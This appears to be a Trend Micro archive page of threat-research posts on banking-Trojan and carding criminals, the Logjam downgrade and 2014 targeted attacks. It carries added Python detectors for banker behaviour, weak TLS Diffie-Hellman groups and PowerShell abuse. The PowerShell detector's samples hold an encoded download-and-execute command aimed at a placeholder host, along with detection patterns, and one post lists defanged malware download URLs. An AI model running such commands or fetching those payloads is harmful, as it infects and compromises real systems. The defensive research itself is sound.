    Author Archive - Trend Micro

    A 20-year-old college student whose underground username is Lordfenix has become one of Brazil’s top banking malware creators. Lordfenix developed his underground reputation by creating more than a hundred online banking Trojans, each valued at over US$300. Lordfenix is the latest in a string of young and notorious solo cybercriminals we’re seeing today.

    Who is Lordfenix?

    Lordfenix is a 20-year-old Computer Science student from Tocantins, Brazil. We were able to trace his activity back to April 2013. At the time, he was operating under a different handle, Filho de Hakcer (Portuguese for “hacker’s son,” but misspelled). He was posting in forums, asking for programming assistance for a Trojan he was supposedly creating.

    Figure 1. Forum post of Lordfenix, then Filho de Hakcer

    Based on a photo he posted on Facebook dated September 2013, it appears he was successful in his work.

    Figure 2. Facebook post boasting of his success with his Trojan

    Information theft via fake browsers

    Lordfenix has since continued to develop and sell banking Trojans, one of which we detect as TSPY_BANKER.NJH. This Trojan is able to identify when a user types any of its target banks’ URLs. Among these targets are Banco de Brasil, Caixa, and HSBC Brasil.

    It is then able to close the current browser window (if it’s running on Google Chrome), display an error message, and then open a new fake Chrome window. This whole routine is almost unnoticeable since the browser windows are switched seamlessly. In case the user’s browser is Internet Explorer or Firefox, the original window stays open, but the error message and the fake browser window still appear.

    Figure 3. Fake browser window

    Figure 4. Spoofed HSBC Brasil banking site

    Figure 5. Spoofed Banco de Brasil banking site

    If the user enters his login credentials in the fake window, the malware sends the information back to the attacker via email—the same email address Lordfenix used during his “Filho de Hakcer” days.

    To evade security products, this malware terminates the process GbpSV.exe. This process belongs to G-Buster Browser Defense, a security program many Brazilian banks deploy to defend against information theft and protect their customers’ privacy during online transactions.
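    The behaviour described above gives a defender three observable events: a process killing GbpSV.exe, a process killing the browser, and a non-mail process opening an SMTP connection to exfiltrate the captured credentials. The following is an added detection example written for this post, not Trend Micro code; the log line format, the field names, the allow-list of mail clients and every sample event are constructed for illustration.

```python
"""Added detection example, not Trend Micro code: flags the chain the page
describes for TSPY_BANKER.NJH (a process killing G-Buster's GbpSV.exe and a
browser, then a non-mail process talking SMTP).  The log format, field names
and every sample line below are constructed for illustration."""
import re
from collections import defaultdict

BANK_DEFENSE_PROCESS = "gbpsv.exe"                 # G-Buster Browser Defense service (named on the page)
BROWSERS = {"chrome.exe", "iexplore.exe", "firefox.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allow-list of processes expected to use SMTP
SMTP_PORTS = {25, 465, 587}

# Constructed line format: "<Kind> image=<path> [target=<path>] [dport=<n>]"; paths may contain spaces.
LINE_RE = re.compile(
    r"^(?P<kind>\w+)\s+image=(?P<image>.+?)"
    r"(?:\s+target=(?P<target>.+?))?(?:\s+dport=(?P<dport>\d+))?\s*$"
)

SAMPLE_LOG = [  # constructed sample events, not real telemetry
    r"ProcessTerminate image=C:\Users\ana\AppData\Roaming\svchosts.exe target=C:\Program Files\GbPlugin\GbpSv.exe",
    r"ProcessTerminate image=C:\Users\ana\AppData\Roaming\svchosts.exe target=C:\Program Files\Google\Chrome\Application\chrome.exe",
    r"NetworkConnect image=C:\Users\ana\AppData\Roaming\svchosts.exe dport=587",
    r"NetworkConnect image=C:\Program Files\Microsoft Office\root\Office16\outlook.exe dport=587",
    r"ProcessTerminate image=C:\Windows\explorer.exe target=C:\Program Files\Google\Chrome\Application\chrome.exe",
]


def basename(path: str) -> str:
    """Case-folded file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def observations(lines):
    """Map each image (by file name) to the suspicious things it did."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                                    # ignore lines in another format
        kind, image = m["kind"], basename(m["image"])
        if kind == "ProcessTerminate":
            victim = basename(m["target"] or "")
            if victim == BANK_DEFENSE_PROCESS:
                seen[image].append("terminated GbpSV.exe (G-Buster Browser Defense)")
            elif victim in BROWSERS:
                seen[image].append(f"terminated browser {victim}")
        elif kind == "NetworkConnect":
            dport = int(m["dport"] or 0)
            if dport in SMTP_PORTS and image not in MAIL_CLIENTS:
                seen[image].append(f"non-mail process connected to SMTP port {dport}")
    return dict(seen)


def alerts(lines):
    """Alert on any image that killed the bank's defense module, or that shows at
    least two of the behaviours (Explorer closing Chrome for a user is not enough)."""
    out = {}
    for image, reasons in observations(lines).items():
        if any("GbpSV" in r for r in reasons) or len(reasons) >= 2:
            out[image] = reasons
    return out


if __name__ == "__main__":
    for image, reasons in alerts(SAMPLE_LOG).items():
        print(f"ALERT {image}: " + "; ".join(reasons))
```

    Killing GbpSV.exe is treated as sufficient on its own because no legitimate process on a customer's machine has a reason to do it; the other two signals are only combined, so that a user closing the browser or a genuine mail client sending mail does not page anyone.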

    Cybercrime for free

    Lordfenix has grown quite confident in his skills. We found him offering free versions of fully-functional banking Trojan source code to underground forum members. He claims these free versions can steal credentials from customers of four different banks. But this generosity has a limit. If other members would like to target more banks, they would have to contact him, and he would sell them TSPY_BANKER.NJH. We checked this banking Trojan and it is, in fact, operational.

    Figure 6. Forum post advertising free banking Trojan source code

    We also found him advertising banking Trojans through his Skype profile. There, the Trojans are referred to as keylogger (KL) proxy—based on the keylogging capabilities of the malware.

    Figure 7. Lordfenix’s Skype profile

    Cybercriminal upstart

    Based on our research, Lordfenix has created more than 100 different banking Trojans, not including his other malicious tools, since April 2013. With each Trojan costing around R$1,000 (roughly US$320), this young cybercriminal channeled his talent in programming into a lucrative, illegal venture.

    Aside from the ease of creating malware, a few other factors may have urged Lordfenix to start up his own little enterprise:

    • Brazil has a huge online banking user base. In 2013 alone, around 51 percent of all banking transactions within the country were done via the Internet.
    • Digital crime is not necessarily a top priority in Brazil. The penalties against offenders are currently very low.

    Despite working alone and being only 20 years old, Lordfenix has managed to make his name known among his fellow criminals. His story—the young cybercriminal inflicting serious damage—is near-identical to that of the teens developing mobile ransomware in China. He is also not the first solo operator we have noted this quarter. The likes of Frapstar (Canada) and the cybercriminals behind FighterPOS (Brazil) and HawkEye (Nigeria) are all individual players using basic malware to gain profit.

    In cybercrime, it doesn’t matter if the criminal is a veteran or a newbie. The result remains the same: ordinary users become victims.

    Posted in Malware

    By now cybercrime has become the fastest-growing criminal enterprise of the 21st century, run by efficient organizations with great professionalism. Today, news headlines are mostly about large-scale breaches orchestrated by large criminal syndicates. But smaller one-man operations can be equally devastating to unwitting home users and businesses. This reminds us that cybercriminals come in all shapes and sizes and still lurk around every corner of the Internet, waiting to prey on an unsuspecting victim.

    In order to shed some light on these lone wolf hackers, we showcase the activities of an individual located in Canada, whom we investigated and reported to the Canadian authorities. This individual uses the handles ksensei21, frapstar and badbullz in various crime and hacking forums, and will be referred to in this report as Frapstar. Are the one-man cybercrime operators in the shadowy online crime underground the evolved version of the petty thief?

    Individual thieves vs. Organized gangs

    The online black market has several tiers that offer different levels of access to different kinds of services: There are “closed” portals – those that require cybercriminals to go through a long vetting process, and there are those that are more “open”, mostly operating in public forums with a low barrier for entry.

    Not surprisingly, these tiers mirror the type of product and expertise available: the “closed” portals deal more with sophisticated malware and exploit kits, while the open portals serve as a wonderland for all kinds of smaller-scale criminal activity, mostly dealing with credit cards, social security numbers, health insurance information and the like.

    Some researchers suggest that 80% of cybercrime stems from cybercriminal enterprises which have their own resources for developing malicious code, control their own botnets and treat their dealings like a legitimate business. That leaves about 20% carried out by individuals, who venture out on their own. This number is substantial and these independently operating criminals can cause significant damage: a recent Trend Micro research paper detailed how a one-man PoS malware operation captured 22,000 credit cards in Brazil.

    FRAPSTAR – A Canadian specimen of the one-man cybercrime operators

    Frapstar used the handles ksensei21, frapstar and badbullz, and he actually used these same names across all kinds of crime- and non-crime-related platforms on the Internet. We even found him openly searching for conspirators on the public Internet. This is clearly the mark of a one-man and relatively amateurish operation: most criminals that we track know better than to ask for conspirators, especially not in Canada, where a large country with a small populace makes for an easy grid to track someone down. Cybercrime enterprises are not rampant in Canada compared to the US, and this may explain why Frapstar is operating alone: groups mostly operate with cybercriminals in close geographic proximity.

    Figure 1. Frapstar posting a “job offer” for other cybercriminals

    Using an email address and handle associated with Frapstar, we discovered that he is also active in other online forums. In checking his posts, we found that he has posted about being a fan of expensive cars and owning an older model BMW 540i. On a popular BMW forum, he even states his name as “Chuck” and that he is located in Montreal; not to forget he adds his (gmail!) email-address for correspondence on these matters.

    Figure 2. Forum post by Frapstar stating that he owns a BMW 540i (Click to enlarge)

    Figure 3. Frapstar mentioning his name and location in a forum post (Click to enlarge)

    Figure 4. Frapstar mentioning his Gmail email address in a forum post (Click to enlarge)

    This finding gives a peek of what kind of lifestyle Frapstar has. He is obviously living comfortably and is able to afford some luxuries. We are not certain whether Frapstar has a different day job that supplements his cybercrime operations, but we believe that he is earning a substantial amount from his operations.

    Virtual marketplaces for your criminal needs

    Frapstar was very active in known cybercrime and hacking forums. These forums are platforms to sell sensitive information “dumps,” the underground term for batches of stolen data that often include credit card and social security numbers. Cybercriminals can also purchase off-the-shelf malware directly from coders in these crime and hacking forums. Listed are the handles in these forums that we could identify as and attribute to Frapstar:

    Handle          Forum type
    frapstar        Carding forum
    frapstar        PII and carding forum
    frapstar        Hacking forum
    badbullz        Carding forum
    badbullzvenom   Russian hacking forum
    badbullzvenom   Russian hacking forum

    Table 1. Frapstar’s handles in crime and hacking forums

    Lampeduza, for instance, is a well-known crime forum and a marketplace for selling credit card dumps. Forum posts are de facto bulletin boards that announce merchandise for sale with details about how the actual exchange will be conducted. The actual dealings go down via instant messenger applications such as Jabber or ICQ; payments are made via anonymous money transfers with providers such as Western Union, MoneyGram, WebMoney or Bitcoin. Frapstar’s preferred payment methods seem to be Western Union or WebMoney.

    Looking at the different forums Frapstar frequented and the content of his posts, we concluded that he is in the “carding” business, i.e. selling credit card and possibly PII dumps; he also has Canadian passports to offer. Online fraud consists of two parts: 1) the stealing and collecting of data and 2) utilizing the stolen data through purchases or other means. Frapstar belongs to the first category as he sticks to selling the stolen credit card information as “dumps” for a sizeable profit.

    Figure 6: Frapstar’s forum posts, where he talks about different kinds of services and job offers (Click to enlarge)

    Figure 7: Frapstar’s services allow cybercriminals to replace credit card details if they’re already inactive

    How crooks like Frapstar steal data

    In our investigations we were led to the conclusion that Frapstar stole credit card details by using information-stealing malware he bought from other cybercriminals. He also bought spamming and botnet services to deploy the malware into victims’ systems.

    Frapstar used a range of malware families to gain entry and maintain persistence in his targets’ environments. We tracked a domain registered to Frapstar, liveupdate[.]su, hosted by Voxility in Romania, where we saw malware hosted at:

    • http://liveupdate[.]su/a5/grabber_7423.exe
    • http://liveupdate[.]su/a5/andro_78423.exe
    • http://liveupdate[.]su/a5/pony_43242.exe

    Upon further analysis, we’ve found that Frapstar primarily uses the following malware families in his operations:

    Malware family   Function
    Zeus             Primary: botnet; secondary: data-stealing functions
    Zbot             Primary: botnet; secondary: data-stealing functions
    VBNA             Worm written in Visual Basic
    SillyFDC         Autorun worm
    Various          Scanners, password stealers, droppers, downloaders, and backdoors

    Table 2. Malware types used

    Based on the tools he used, we can assume that Frapstar was able to affect both home users and businesses. His strategy of using multiple malware types resembles a Swiss Army knife: Frapstar purchases malware with different capabilities and uses each depending on his current needs. This also highlights a key fact about the user: Frapstar is a script kiddie who shops for malware on hacking forums but also possesses enough know-how to use the malware effectively.

    Different means, same end

    Frapstar and his fellow crooks are on the lower end of today’s billion dollar crime business, but they realize the promise of high returns in the face of relatively low cost and risk, and therefore, grasp the opportunity. Buying malware nowadays is easy and relatively cheap, which makes the idea of launching such a “career” very attractive for hundreds, if not thousands of one-man operators. However, whoever is launching the attack does not matter greatly to the user. Regardless of whether it is a one-man operator or a cybercrime enterprise, for the victim, it still causes significant financial loss and damage. What this really shows, is that there is a large bandwidth of different criminal types with varying scales at which they operate, and they are all targeting the same set of users.

    Posted in Malware


    Another flaw has been found in the cryptographic protocols that secure the Internet. This flaw, named the Logjam attack by its discoverers (researchers from various universities and companies), allows a man-in-the-middle attacker to downgrade the key exchange used in secure connections (such as HTTPS, SSH, and VPNs) to a far weaker one. In theory, this means that an attacker with sufficient resources can break the session keys and read the “secure” traffic.

    In some ways, this attack is similar to the recent FREAK attack. Both attacks were made possible by support for “export-grade” encryption standards. Until the 1990s, cryptography was considered a “munition” in the United States and limits were placed on the strength of cryptography that products “exported” for use outside of the US could support. Unfortunately, what was “acceptable” cryptography then can now be cracked with sufficient computation resources.

    The vulnerability lies in how the Diffie-Hellman key exchange is negotiated. Logjam can be used to force the connection onto a Diffie-Hellman group that uses a 512-bit prime (as used in “export-grade” cipher suites), and the discrete logarithm in such a group is within reach of the attacker after a one-time precomputation for that prime. Related research by the same team showed that the precomputation approach also threatens systems that use 768- and 1024-bit primes. Nation-states may have the resources needed to exploit this; that would allow an attacker to decrypt secure traffic that has been passively collected.

    Who is at risk?

    Theoretically, any protocol that uses the Diffie-Hellman key exchange is at risk from this attack. However, note that this attack requires two factors on the part of the attacker: the ability to intercept traffic between the secure server and the client, as well as significant computation resources.

    The researchers estimate that up to 8.4% of all sites in the top one million domains are vulnerable. Similar percentages of POP3S and IMAPS (secure email) servers are at risk.

    What should I do now?

    For end users, there’s really only one thing to do: update your browsers. All the major browser vendors (Google, Mozilla, Microsoft, and Apple) are preparing updates for their various products, and should release an update soon. You can also check if your browser is vulnerable by visiting this site.

    For software developers, the fix is also relatively simple. Check that any encryption libraries that are used or bundled with your application are all up to date. In addition, the use of larger prime numbers for key exchange can be specified as well.

    The main task falls on IT administrators with servers that use any of the at-risk services and protocols. In these cases, the following needs to be performed:

    • Disable support for all export cipher suites, to ensure they cannot be used.
    • Increase the number of bits used by the prime numbers in the Diffie-Hellman key exchange to 2048 bits; this ensures that exceptional computational powers would be needed to break any encryption based on this process.
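    Both administrator steps can be verified mechanically: the first by checking that no export suite ID appears in what a server (or a client) is willing to negotiate, the second by parsing the ServerKeyExchange a server actually sends and measuring the prime it chose. The block below is an added example for this post, not Trend Micro code or the Logjam researchers’ code; it parses the ServerDHParams structure from RFC 5246 section 7.4.3 and runs on constructed messages whose prime bytes are length-correct placeholders rather than real groups.

```python
"""Added example, not Trend Micro code or the Logjam researchers' code: the two
checks an admin or a client library wants for the steps above, run on
constructed TLS messages.  The prime bytes below are length-correct placeholders,
not the real export-grade or 2048-bit groups."""
import struct

# Export-grade cipher suite IDs from the TLS 1.0/1.2 registries (RFC 2246 A.5, RFC 5246 A.5).
EXPORT_SUITES = {
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0006: "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
    0x0008: "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x000B: "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA",
    0x000E: "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x0011: "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA",
    0x0014: "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x0017: "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5",
    0x0019: "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA",
}


def offered_export_suites(suite_ids):
    """Names of export suites in a cipher_suites list (ClientHello or server config);
    the first admin step is done when this is empty everywhere."""
    return [EXPORT_SUITES[s] for s in suite_ids if s in EXPORT_SUITES]


def parse_server_dh_params(body: bytes):
    """Parse ServerDHParams at the start of a DHE ServerKeyExchange (RFC 5246 7.4.3):
    dh_p, dh_g, dh_Ys, each a 2-byte length followed by a big-endian integer.
    The signature that follows is ignored here."""
    off, fields = 0, []
    for name in ("dh_p", "dh_g", "dh_Ys"):
        if off + 2 > len(body):
            raise ValueError(f"truncated before {name} length")
        (n,) = struct.unpack_from("!H", body, off)
        off += 2
        if n == 0 or off + n > len(body):
            raise ValueError(f"bad {name} length {n}")
        fields.append(int.from_bytes(body[off:off + n], "big"))
        off += n
    p, g, ys = fields
    if not 2 <= ys <= p - 2:
        raise ValueError("server public value outside [2, p-2]")
    return p, g, ys


def dh_strength(body: bytes, min_bits: int = 2048):
    """(weak?, bits) for the group a server offered.  A Logjam-style MITM makes the
    server pick a 512-bit export group; a client that enforces min_bits refuses it
    even though the ServerKeyExchange signature is valid."""
    p, _, _ = parse_server_dh_params(body)
    return p.bit_length() < min_bits, p.bit_length()


def build_server_key_exchange(p: bytes, g: bytes, ys: bytes) -> bytes:
    """Encode ServerDHParams the way a server would (signature omitted)."""
    return b"".join(struct.pack("!H", len(x)) + x for x in (p, g, ys))


# Constructed messages: a 512-bit (64-byte) group like a DHE_EXPORT downgrade
# produces, and a 2048-bit (256-byte) group.  Placeholder bytes, not real primes.
EXPORT_SKE = build_server_key_exchange(b"\xff" * 64, b"\x02", b"\x7f" + b"\x01" * 63)
STRONG_SKE = build_server_key_exchange(b"\xff" * 256, b"\x02", b"\x7f" + b"\x01" * 255)

if __name__ == "__main__":
    print("export suites offered:", offered_export_suites([0x0014, 0x009E, 0xC02F]))
    for label, msg in (("export", EXPORT_SKE), ("strong", STRONG_SKE)):
        weak, bits = dh_strength(msg)
        print(f"{label}: p is {bits} bits -> {'REJECT' if weak else 'accept'}")
```

    The signature check is deliberately not the defence here: in the Logjam downgrade the server really did sign those 512-bit parameters, so the signature verifies. What stops the attack on the client side is refusing any group below the chosen minimum, and on the server side never having a 512-bit group (or an export suite) available to sign in the first place.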

    Trend Micro solutions

    We have released the following rules for  Trend Micro Deep Security and Vulnerability Protection users that protect against this threat:

    • 1006561 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Response
    • 1006562 – Identified Usage Of TLS/SSL EXPORT Cipher Suite In Request
    • 1006740 – Identified SSL/TLS Diffie-Hellman Key Exchange Using Weak Parameters Client
    • 1006741 – Identified SSL/TLS Diffie-Hellman Key Exchange Using Weak Parameters Server

    Post updated on May 20, 2015 7:45 PM PDT to add Trend Micro solutions. 

    Post updated on May 21, 2015 1:40 PM PDT to refine Trend Micro solutions.

    Post updated on June 19, 2015 12:06 PM PDT to add Trend Micro solutions.

    Posted in Vulnerabilities


    2014 was a year in which we saw further refinements in targeted attack methodologies. As more organizations upgraded to newer versions of Windows, we saw the increased use of 64-bit malware in several campaigns. Examples of 64-bit malware include HAVEX, a remote access Trojan (RAT) used in a campaign that targeted industrial control systems (ICS), and WIPALL, the notorious malware behind the Sony Pictures hack.

    The move to newer versions of Windows also led to the abuse of legitimate tools and features in attacks. An example is Windows PowerShell®, which ships with Windows 7 and later and lets system administrators drive the system without a graphical user interface (GUI). PowerShell commands were abused to download malicious files and to bypass the execution policy, which allowed the downloaded files to be executed.
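    Because the download and the execution-policy bypass both live in the PowerShell command line, process-creation telemetry is where a defender sees them, provided any -EncodedCommand payload (Base64 of UTF-16LE text) is decoded first. The block below is an added example for this post, not Trend Micro code; the indicator list is a starting point rather than a complete signature set, and every command line in it is constructed for illustration.

```python
"""Added example, not Trend Micro code: surfaces the PowerShell abuse the page
describes (download of a payload, bypass of the execution policy) in process
command lines, decoding -EncodedCommand payloads first so the indicators cannot
hide inside Base64.  Every command line below is constructed for illustration."""
import base64
import re

# Each indicator: (regex over the normalised command line, label).  Abbreviated
# parameters (-ep, -exec, -nop, -w) are matched because attackers use them.
INDICATORS = [
    (r"-e(?:p|x\w*)\s+bypass", "execution policy bypass"),
    (r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", "file download"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile", "profile suppressed"),
]
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_commands(cmdline: str):
    """PowerShell's -EncodedCommand is Base64 of UTF-16LE text; return each decoded payload."""
    decoded = []
    for token in ENCODED_RE.findall(cmdline):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue          # not actually an encoded command (e.g. a short flag value)
    return decoded


def classify(cmdline: str):
    """Labels of every indicator present in the command line or its decoded payloads."""
    text = " ".join([cmdline, *decode_encoded_commands(cmdline)])
    return [label for pattern, label in INDICATORS if re.search(pattern, text, re.I)]


def scan(cmdlines):
    """(command line, labels) for each line that trips at least one indicator."""
    results = []
    for line in cmdlines:
        labels = classify(line)
        if labels:
            results.append((line, labels))
    return results


# Constructed samples.  The downloader stage is encoded the way an attacker would encode it.
PAYLOAD_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED_SAMPLE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(PAYLOAD_TEXT.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    ENCODED_SAMPLE,
    r"powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\Users\ana\AppData\Local\Temp\update.ps1",
    r"powershell.exe -Command Get-Process | Sort-Object CPU",
]

if __name__ == "__main__":
    for line, labels in scan(SAMPLE_CMDLINES):
        print(", ".join(labels), "<-", line[:80])
```

    The second sample shows why the execution-policy indicator needs context: administrators legitimately run signed maintenance scripts with -ExecutionPolicy Bypass, so in practice that label is weighted by the script's location (a user's Temp directory, as here) and by whether a download indicator appears in the same process tree.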

    A document exploit template, detected as TROJ_MDROP.TRX, was found in several targeted attacks. This exploit was most likely sold and distributed underground because of its use in several campaigns. Threat actors could simply modify the exploit template to fit their intended payload.

    Based on our data, .RTF and .DOC files were the two most frequently used email attachments, most likely because Microsoft Word® is used in nearly every organization.

    Figure 1. Most frequently used email attachment file types in targeted attacks in 2014

    Old and New Vulnerabilities in Attacks

    Several zero-day exploits were used in targeted attacks in 2014. For example, two Taidoor-related zero-day attacks exploiting CVE-2014-1761 hit government agencies and an educational institution in Taiwan, with a window of exposure of 15 days. Exploiting new vulnerabilities has proven more effective because the software vendor has yet to release a patch and security vendors have yet to add detections. Zero-day exploits can catch vendors and victims alike unawares.

    The use of new vulnerabilities doesn’t mean that threat actors have done away with older ones. In fact, targeting old vulnerabilities also proved reliable because attackers can just use tried-and-tested exploits that may be easily bought.

    Despite being patched via MS12-027, CVE-2012-0158 remained a favored vulnerability for attackers. Additionally, it was the most exploited vulnerability used by targeted attacks in the first half of 2014. Two notable campaigns, PLEAD and Operation Pawn Storm, abused this vulnerability to infiltrate target networks.

    A Global Problem

    Government agencies remained the most favored attack targets in 2014. In the second half of the year, we saw a spike in the number of attacks that targeted hardware/software companies, consumer electronics manufacturers, and health care providers.

    We also determined the global distribution of targets accessing C&C servers. As shown in the heat map below, the United States, Russia, and China were no longer the only favored targets. Other targets included Taiwan, South Korea, France, and Germany.

    Figure 2. Top countries that communicated with targeted attack C&C servers in 2014 (click the image to enlarge)

    Keeping Up with Threats

    Given the increased volume of targeted attacks, the ease of mounting them, and the difficulty of protecting against them, network defenders must adopt a shift in mindset from prevention to detection. This means accepting that targeted attacks will eventually hit their networks, and that no suite of blacklisting technologies can be relied on to keep determined threat actors at bay.

    Building threat intelligence is crucial in the fight against targeted attacks. Knowledge of the tools, tactics, and procedures that threat actors use based on external reports and internal historical and current monitoring can help create a strong database of indicators of compromise (IoCs) that can serve as basis for action. But organizations shouldn’t limit themselves to simply knowledge of the attacks. Establishing and empowering incident response teams and training employees, partners, and vendors on social engineering and computer security can also help mitigate the risks involved with targeted attacks.

    For full details on our findings, you may read our Targeted Attack Trends: 2014 Annual Report.


    Last week, we released a research paper titled “Operation Arid Viper: Bypassing the Iron Dome” in which we detailed two related campaigns. To recall, here are our key findings related to the two campaigns:

    • Palestinian threat actors have staged a targeted attack, Operation Arid Viper, to exfiltrate data from high-profile targets in the Israeli government and have been doing so since mid-2013. The attacks are still on-going, coinciding with the political tension between Israel and Palestinians.
    • Investigation of the Germany-hosted server used in Arid Viper revealed a group of Egyptian hackers (Advtravel) that have less technical knowhow and are attacking other Egyptians in less purposeful attacks.
    • Both groups have strong Arab ties, and the same server and site registration details suggest the existence of a supra-organization, a forum or an influential sponsor could be providing various hacking groups with the means to pursue their ends.

    Since the report was released, we have continued our investigation and have a number of updates:

    • None of the C&C domains have moved to other hosting providers or had other major changes since the publication of our report. Although we have not seen newly compiled samples being spread, we have seen two recent attempted infections with existing Arid Viper binaries, on the 15th and 19th of February, against targets in Israel and Kuwait respectively. For reference, our paper went public on the 16th.
    • Interestingly, a number of the people linked to the C&C servers in the paper have made changes to their public profiles since the paper went live. To date none of these individuals have contacted us to dispute the details we outlined in the paper:
      • The Facebook account we mentioned in the paper for Fathy Mostafa is now no longer active.
      • Quite a number of the accounts we related to Ebrahim Said El-Sharawy (aka Dev_Hima) have been modified or removed. Upon inspection today, his accounts on Blogspot, Facebook, and Twitter are no longer active. His main webpage (which had hosted two questionable tools we outlined in the report) has been changed to remove all of that content and now shows only the words “Closed by DevHima”:


    •  Some of his other accounts such as his LinkedIn, SoundHound, and YouTube (which is hard to remove without deleting your personal Gmail account) are still live at the time of writing.
    • After further investigation, we now believe that the email address used to register the C&C domain pstcmedia[dot]com actually belongs to the Web hosting provider that registered this domain on a client’s behalf, and not to an individual involved in the campaign itself. We have updated our paper to remove reference to Mr. Samraa, except for the fact that the email address was used to register this site.

    Trend Micro will continue to research more on these campaigns over the coming months and post updates as we find them.

    Posted in Targeted Attacks | Arid Viper Update: Attacks Ongoing, Threat Actors on the Move


    © Copyright 2013 Trend Micro Inc. All rights reserved.